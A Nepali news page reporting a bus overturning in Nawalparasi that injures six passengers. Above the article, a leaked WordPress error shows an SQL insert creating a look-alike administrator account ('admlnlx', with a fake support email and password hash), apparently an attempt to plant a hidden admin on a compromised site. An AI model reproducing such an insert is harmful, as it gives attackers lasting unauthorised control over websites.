WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdCInDUzj4kCre4HRBo.uXGzSmfvZH/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:53:15', '', 'admlnlx', 'admlnlx')
नवलपरासी,फागुन १ –
पूर्वपश्चिम राजमार्गअन्तर्गत नवलपरासी नयाँबेलाहानीमा आज बिहान यात्रुवाहक बस पल्टिँदा बसमा सवार छ जना घाइते भएका छन् ।
पूर्वबाट पश्चिमतर्फ आउँदै गरेको लु१ख ६२७४ नंको बस अनियन्त्रित भई सडकको बायाँपट्टि पल्टिँदा सो दुर्घटना भएको थियो । काभ्रेपलाञ्चोक, सिन्धुपाल्चोक, गुल्मी, सुनसरी र सप्तरीका घाइतेको उपचारका लागि पुरानो मेडिकल कलेज, भरतपुर लगिएको छ ।